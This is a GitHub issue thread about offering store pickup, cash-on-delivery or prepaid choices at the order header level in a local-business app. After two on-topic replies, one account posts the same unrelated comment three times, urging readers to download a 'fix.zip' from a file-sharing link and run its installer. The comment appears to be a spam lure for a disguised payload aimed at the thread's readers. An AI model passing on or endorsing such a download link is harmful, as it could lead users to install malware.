### ISSUE TITLE
cod / prepaid

### ISSUE THREAD

**Issue by amarkalale** [IntentBrowser/localbiz#12]
IT should be at header level and not line level.
Unless we accept this from user, we should not show this.

Choices we should provide at header level as input are 

- Store pickup
- Home delivery, COD
- Home delivery, prepaid
We should send user choice in whatsapp msg

**Comment by venkatramanm** [comment]
Currently showing these at header level as information attributes.

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."
